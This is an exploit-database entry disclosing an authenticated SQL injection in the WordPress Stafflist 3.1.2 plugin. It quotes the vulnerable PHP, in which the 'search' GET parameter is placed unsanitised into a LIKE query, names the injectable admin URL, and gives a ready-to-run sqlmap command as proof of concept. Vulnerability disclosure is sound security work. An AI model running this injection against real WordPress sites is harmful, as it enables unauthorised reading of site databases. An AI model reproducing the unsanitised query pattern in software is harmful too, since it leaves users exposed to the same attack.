id: 37680
date: 05/03/2022
title: WordPress Stafflist 3.1.2 SQL Injection Vulnerability
author: Hassan Khan Yusufzai
cves: 

# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection
(Authenticated)
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
...
  $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
      LOWER(firstname) LIKE '%{$w}%' OR
      LOWER(department)  LIKE '%{$w}%' OR
      LOWER(email) LIKE '%{$w}%'" : "");


# Vulnerable URL

http://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]

# POC

```
sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'
--cookie="wordpress_cookies_paste_here"
```

# POC Image

https://prnt.sc/AECcFRHhe2ib

#  0day.today [2023-03-26]  #